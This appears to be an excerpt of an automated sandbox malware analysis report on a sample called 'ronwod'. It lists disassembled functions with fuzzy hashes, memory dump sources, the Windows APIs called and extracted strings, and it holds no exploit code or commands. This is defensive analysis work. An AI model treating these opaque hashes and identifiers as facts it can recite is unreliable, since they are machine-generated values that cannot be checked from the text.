Instruction ID: 547413dd14b0a9d7d6464c0981c8fcf1c562ce092ccf56823f3ea5e8920057e6
Opcode Fuzzy Hash: 4b619af3f94dd6cf09828fd9a885fdef36e154f3bbe57ce9ddd71a20d344d06f
Instruction Fuzzy Hash: 68611433B15A914FCB1C8D7C9C512A9AA535B9B330B2E837EAA71AF3D1C7255C0583A1

Function 00EC1E50 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc447a96af106c5ff3648db3a8e948970e5f0f44e98cb55ccd76eba15ce641b
Instruction ID: b562f8e481b8cf925e191d2d6fe65c3c96c79df8b5134315bc11770ac626713e
Opcode Fuzzy Hash: 9bc447a96af106c5ff3648db3a8e948970e5f0f44e98cb55ccd76eba15ce641b
Instruction Fuzzy Hash: C7611A32B159914BC7189D3D5C513B9BA538F9733072DD3AEFAB2AF3E5C22648068390

Function 00EC20B0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e5847bcb5cfd431a3ba1a3252827a6dd9fe238bdad30bd38dc01807e97f8dd
Instruction ID: 3c23a446862d6fba0f8e3ee5dd76c112fd11a5dc42c0dbb2c1754cc9c78bd037
Opcode Fuzzy Hash: 37e5847bcb5cfd431a3ba1a3252827a6dd9fe238bdad30bd38dc01807e97f8dd
Instruction Fuzzy Hash: 6B51373375A9904BE72CC93D5C123A67A834BE3334B2DD76EA6B1DB3F0D56688064250

Function 00EAC3F4 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b6e35d231150894ddc9903a190a9d99de00d50b105ad9bbeed18d36965f0f2
Instruction ID: d980d7fc9763461ce6061bedf5a6faee1241548f6263cb269d850ec0cf19068d
Opcode Fuzzy Hash: 38b6e35d231150894ddc9903a190a9d99de00d50b105ad9bbeed18d36965f0f2
Instruction Fuzzy Hash: C75127B09107118FC724CF29C841262B7F2FFAA304728961DD4969F764E33AF852CB95

Function 00EC7170 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
Instruction ID: 0051f09bd257a39f65c3dbed3e6940de28426794f93af4db9b0976a9382c6ab8
Opcode Fuzzy Hash: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
Instruction Fuzzy Hash: CA517CB15087548FE314DF29D89475BBBE1BBC4318F044A2DE4E997351E37ADA098F82

Function 00EBF211 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dee111842bd13b6f04615752da2e494bbbd1b81649c6d598ef8627859b9f1fbb
Instruction ID: 0e783ae7eaa65ae9c32ea1fd1e3a19dd851cad71ebed285ec355e666e5338457
Opcode Fuzzy Hash: dee111842bd13b6f04615752da2e494bbbd1b81649c6d598ef8627859b9f1fbb
Instruction Fuzzy Hash: FE51A372715B414BD328CF39CD92297BBE2AF99310F19DA3CD5AAC77E4D638A4018B11

Function 00ED0650 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9167929e66d3b03f824eff2d8ca577f4af1b45d2667c165ab0bb73e79585a72d
Instruction ID: 41dd9b42ce934a3d7a1eef544d64c1a113dfed6b9ad430c7a8b824ff5c8d7b8a
Opcode Fuzzy Hash: 9167929e66d3b03f824eff2d8ca577f4af1b45d2667c165ab0bb73e79585a72d
Instruction Fuzzy Hash: E84148382553009FD7149F14DD81F7EB7A6EBC4318F28652EE198AB3A1DA71F8228705

Function 00EB4CCD Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c31b8b4eb67b57053451e3957e987a1e5726c6403d48a04c38f10b4e9c995e
Instruction ID: 3b20913a54f579ac5e4f69d43733c18ebd3148a0854581c7161419a4480e57a7
Opcode Fuzzy Hash: 10c31b8b4eb67b57053451e3957e987a1e5726c6403d48a04c38f10b4e9c995e
Instruction Fuzzy Hash: 5A4102B5E11121DFDB18CF28E9416AAB3B2FF89300F14A57AC849F3795DB345914CB80

Function 00ECDE19 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8f05c5c6cc025d4388265cff122aeb38395a6c1d279dc7d119d7dd96c3fcfa
Instruction ID: 5007cffd6242ea0aab400cd56cf91905462e583b75d057ddef545dd6579e6833
Opcode Fuzzy Hash: 1f8f05c5c6cc025d4388265cff122aeb38395a6c1d279dc7d119d7dd96c3fcfa
Instruction Fuzzy Hash: 26311633F045244BD718CA3DCDA17DAB7A3ABD4304F0A917ECC69EB399DA7259024680

Function 00ECB450 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766b1554411ba20f2706dce912db84bc70a6295c5284889bf585f7a777ed78bd
Instruction ID: f44848c22f5f778194859b6ff16d24cf15ac2ec7f1e78ed4a7dfb370da8ce97b
Opcode Fuzzy Hash: 766b1554411ba20f2706dce912db84bc70a6295c5284889bf585f7a777ed78bd
Instruction Fuzzy Hash: D331E372A092149FD710CF19CA85B6BB7E6FFC4718F15982CE888BB211D3729C46CB91

Function 00ECDC5E Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e762ca4aefb707f4a354f6deafc2d379abe02141a8c739fd07de98f1f45ff9d
Instruction ID: 88e3a197c4914771f3c646ad06727f37a5248035bc8ed96858094588cb205ab1
Opcode Fuzzy Hash: 6e762ca4aefb707f4a354f6deafc2d379abe02141a8c739fd07de98f1f45ff9d
Instruction Fuzzy Hash: 1C313872F502258BDB1CCF6DCD523FEB7A2EB89304F08512ED946E7390CA7859018790

Function 00EC8E40 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c2ecff3853d05a80752d91f1f2254589cb319cabc824830e2b7081d4dea16a
Instruction ID: 4ed9674d1579417a5fa74f48720c3a51a981cd69a187c06d86840d4a72a700f8
Opcode Fuzzy Hash: 19c2ecff3853d05a80752d91f1f2254589cb319cabc824830e2b7081d4dea16a
Instruction Fuzzy Hash: 19312B32A187640FC7199D3C8E5066A7A929BC5730F2A973EEEB65B3C1DE355C014381

Function 00EABD8F Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3451580753cd623b86efebd12568cf783dc1e3bdf35c1671658b2117a62d3928
Instruction ID: f5e8b2fb7988bf9f6c4e56888797108f3833daa10b29f3dd0f6e0dffed2ba572
Opcode Fuzzy Hash: 3451580753cd623b86efebd12568cf783dc1e3bdf35c1671658b2117a62d3928
Instruction Fuzzy Hash: 62310736611700CFD7258F25C890652B7E2FF8A318B28E19DC1925F7A6D73AE403C705

Function 00EB822F Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033ec9f29c67475b52df4185f1c9e3345ba13c13e60368c25f72114e4479b4b0
Instruction ID: 60fd4f4eff1d8c20d5e47ed65b410854160606552db91bd9ae2de7bbe851dd6a
Opcode Fuzzy Hash: 033ec9f29c67475b52df4185f1c9e3345ba13c13e60368c25f72114e4479b4b0
Instruction Fuzzy Hash: E92131729096119FE7209B21ED01B6B73E9EFC4304F551429EE68B7362E731AD07CB85

Function 00EB9A43 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a736bfdf469e116a06bf641317b308d7335969a2c4d3834f58967404c08f33
Instruction ID: 00be9169e47f52346f3cbc68e5ae2cf99922f29061d551e350a8afa8ab08f242
Opcode Fuzzy Hash: c5a736bfdf469e116a06bf641317b308d7335969a2c4d3834f58967404c08f33
Instruction Fuzzy Hash: 0B318131919325DFD7108F25E84076BF3E0FB89304F01991EEA8877262D7719D05DB92

Function 00EB91B1 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ad00e063f284d0d0201e1963ad9ea1f06949fa0231316701260b81942ee82e3
Instruction ID: 0ffd74fc4dc2fdb5836006b2cdc51425a02fc26cbeccab2d636ab4ae7290ed20
Opcode Fuzzy Hash: 8ad00e063f284d0d0201e1963ad9ea1f06949fa0231316701260b81942ee82e3
Instruction Fuzzy Hash: E611E93190A121AFD7248B58EC40B7B73A6EB56708F56602DEA45BB273C331DC02D785

Function 00EA5F4C Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ede08f64e9a19757e5c53d0dda705f83fd71b5286fee1783e97ef015325078b
Instruction ID: 234d3f03f02fbee26ddf9f1f63cca491bc8821248a994a564d877e371de76f27
Opcode Fuzzy Hash: 4ede08f64e9a19757e5c53d0dda705f83fd71b5286fee1783e97ef015325078b
Instruction Fuzzy Hash: A421EE366093009FD324CF28D98076AB7E6FFCD314F59682DE5C9E7291DB72A8418749

Function 00EB9266 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cce07f6afa13275e145b763c8c2adddb7070af7bfb5f5b601d16ce0b5e3e6a7
Instruction ID: a5e6513eee71f3404954c00295dbf782320365816e38416e8b32b8440ef1c9e3
Opcode Fuzzy Hash: 3cce07f6afa13275e145b763c8c2adddb7070af7bfb5f5b601d16ce0b5e3e6a7
Instruction Fuzzy Hash: E8216332A192209FD728CB65D450367B3A1BB99705F13952DDD89B7292C3319C55C7C1

Function 00E9FB02 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90fc3640a13f1dbc12a521ecc7f60245cf99333c9cf1b2aff7ce4a397136e257
Instruction ID: 340b3669be0aeab51fc09c0b766f92d1fabf4376ca32e8cd5951b857bf31bf0c
Opcode Fuzzy Hash: 90fc3640a13f1dbc12a521ecc7f60245cf99333c9cf1b2aff7ce4a397136e257
Instruction Fuzzy Hash: 1C110B73E2496147C71C9E3C4C122AA7743AFD6730F2D936EFA77AB2E0CA2159024385

Function 00EA5E8C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e4e66a4ff6249a9ff2901aa44c78874247c9661e997f65bbdfd8daf88969876
Instruction ID: eb42ef5b8e7ad85acd53bc21332252b458d86b13e0766e4468542f12a8e35574
Opcode Fuzzy Hash: 1e4e66a4ff6249a9ff2901aa44c78874247c9661e997f65bbdfd8daf88969876
Instruction Fuzzy Hash: FD11293A715B105FD728CB158C8077AB3E6EBC9318F9A642CA9C97B291DB71AC40C654

Function 00EBD5E6 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ebe20590cd96a2870b0247ecc464e18e89256d79090af09dbcf9b78cbbb9aa
Instruction ID: 421bc4312df9391256bbc2794820d47ea2164a727bb83a708abb97ab4baa8f6b
Opcode Fuzzy Hash: 42ebe20590cd96a2870b0247ecc464e18e89256d79090af09dbcf9b78cbbb9aa
Instruction Fuzzy Hash: 2621E776A2526046CB2CCF39D8A96BBE292EB81300F59E63DD446E72A0FF3485048785

Function 00EC4E60 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5d11d717f375241ce0f49482d95c12c6bd05d4ae6acce4ce5acb2750547282af
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: EC11C673A091D44EC3168D3C8510AA5BFE31A93238B5A939DE4B4AF2D2D6238D8B8354

Function 00EB9F80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction ID: 5bbf4ef4417527cefb8a57d60621680b5e1b7456f97f1757f1702b508aec9987
Opcode Fuzzy Hash: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction Fuzzy Hash: 7A0179F2B0070157EB209E54A4C1777B2E96F81728F1C652CE988B7307EB75EC05C691

Function 00ECB8A0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b38d2cff8981d938ddd0e73ab2222031848459ba32f089bafade59e3217a30ba
Instruction ID: 3f219a10fcfac0fc96181451bf3586017766c4e7b9705f63ca623eec0f1cea09
Opcode Fuzzy Hash: b38d2cff8981d938ddd0e73ab2222031848459ba32f089bafade59e3217a30ba
Instruction Fuzzy Hash: 3B110235004308AFC610AB15ED81D7BB7AEFFD9318F01142CE68467321E333A925CB51

Function 00E9A2A6 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 396d9622aad89f30deeefb19ebac211f5f541f640fb99b28e9d3d59e99fa57a5
Instruction ID: 282a2ff59ea304081541680172914a8e4aeb627333b6ac33b6efbd00aedd0277
Opcode Fuzzy Hash: 396d9622aad89f30deeefb19ebac211f5f541f640fb99b28e9d3d59e99fa57a5
Instruction Fuzzy Hash: 9A113830A593418FDB34CF6A841027AB7E1AF9271472DE92DC4D7AB344DB3498418FC5

Function 00ECCDF0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9ae0c8e56c4c86db73f03189b1994fc6cd5af8ca2c3c94c14149f681e44915
Instruction ID: e8964f2ab154826204da4feaa5df7a675a8fb4cdb2ffc2fd0ccc89ccc97661ca
Opcode Fuzzy Hash: 0f9ae0c8e56c4c86db73f03189b1994fc6cd5af8ca2c3c94c14149f681e44915
Instruction Fuzzy Hash: A5012636D026604FD31DCF38DD1039673E2EB85305F498538CA45EB398DB7A88418680

Function 00E9A533 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684

Function 00233DA0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00233DCF
vfprintf.MSVCRT ref: 00233DEF
abort.MSVCRT ref: 00233DF4
VirtualQuery.KERNEL32 ref: 00233E8B

Strings

Mingw-w64 runtime failure:, xrefs: 00233DC8
VirtualProtect failed with code 0x%x, xrefs: 00233F06
VirtualQuery failed for %d bytes at address %p, xrefs: 00233F37
Address %p has no image-section, xrefs: 00233F4B

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 8b55141942c1119220b492e04e0869b606ec10996d077b5b3ce0ee08ba839bc2
Instruction ID: 557c985b105fccec1571532caa0205989b2eacca9d2634b729aab448fc630501
Opcode Fuzzy Hash: 8b55141942c1119220b492e04e0869b606ec10996d077b5b3ce0ee08ba839bc2
Instruction Fuzzy Hash: 8D5169B19183019FC700EF28E88965AFBF5FF84314F45896CE8889B215D734EA59CF92

Function 002342D0 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0023430F
signal.MSVCRT ref: 00234356
signal.MSVCRT ref: 0023436F
signal.MSVCRT ref: 00234396
signal.MSVCRT ref: 002343D2
signal.MSVCRT ref: 0023441F
signal.MSVCRT ref: 00234435
signal.MSVCRT ref: 0023444B

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: ce1314bdcabdb5bf71d602d2ec5da4bd4365e7c669ea7ecc0d5f886cc6bfdebc
Instruction ID: 95075ec9cbf2a4ede6aa4ad39129ac55ded1b3cd653c1af4eb7930ed69729a0b
Opcode Fuzzy Hash: ce1314bdcabdb5bf71d602d2ec5da4bd4365e7c669ea7ecc0d5f886cc6bfdebc
Instruction Fuzzy Hash: BE316DF05383428AE7107F64E45432EB6E4AF41328F2249DDD9C487281DBB9F8B59B13

Function 00EB349F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00EB3561
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00EB365E

Strings

afrf, xrefs: 00EB35CB
dfkf, xrefs: 00EB35B6
tfff, xrefs: 00EB35BD
s6, xrefs: 00EB366D

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: afrf$dfkf$s6$tfff
API String ID: 237503144-2905920428
Opcode ID: 0cd8d63b5b279aee940692f1ffef8b255468ce53b4312be123606bd20d333dd3
Instruction ID: 38134a8c2ebd0c6b6187e2f38e1790ccf6e295cc6eca9701a5343d916dd25c10
Opcode Fuzzy Hash: 0cd8d63b5b279aee940692f1ffef8b255468ce53b4312be123606bd20d333dd3
Instruction Fuzzy Hash: 0151ADB1D002149FDB14CF9ADC82B9A7BB4FB84310F15816DE904AF399C7758942CBE6

Function 00EB84C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00EB8577

Strings

B]C], xrefs: 00EB84D2
B]V], xrefs: 00EB84E2
S%1e, xrefs: 00EB8546, 00EB8500
S%1e, xrefs: 00EB8590

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: B]C]$B]V]$S%1e$S%1e
API String ID: 237503144-91396555
Opcode ID: 097ea6c5345d2e25c9255fd7a7d0a8c13203ecbc5dfe3e2c136b90875cbfc49e
Instruction ID: 6dc0134e485c05b231d5ad538721c4f33a3321fc9feb95b2b855f5760d3d628f
Opcode Fuzzy Hash: 097ea6c5345d2e25c9255fd7a7d0a8c13203ecbc5dfe3e2c136b90875cbfc49e
Instruction Fuzzy Hash: 1221F17260C3159FE328CF25DC557ABF3E6EBC4704F12C83DA58A9B2D1DAB084068696

Function 00233F60 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00234080
Unknown pseudo relocation bit size %d., xrefs: 002340CD
Unknown pseudo relocation protocol version %d., xrefs: 00234253

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 45bdfa1358390f61dce57cef7d139d3550a5dd958006c70cd0f3b13d759c02f5
Instruction ID: 60f7f56adb889b8c4d1f50c09fdffef2fb8bff89476754515a51306ec5ed4af3
Opcode Fuzzy Hash: 45bdfa1358390f61dce57cef7d139d3550a5dd958006c70cd0f3b13d759c02f5
Instruction Fuzzy Hash: C181C6B1A20706DBCB14EF68E98479EB7F4FF94744F04855AE898A7214D330F9648F91

Function 00231001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0023106B
__p__fmode.MSVCRT ref: 00231070
__p__commode.MSVCRT ref: 0023107D

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
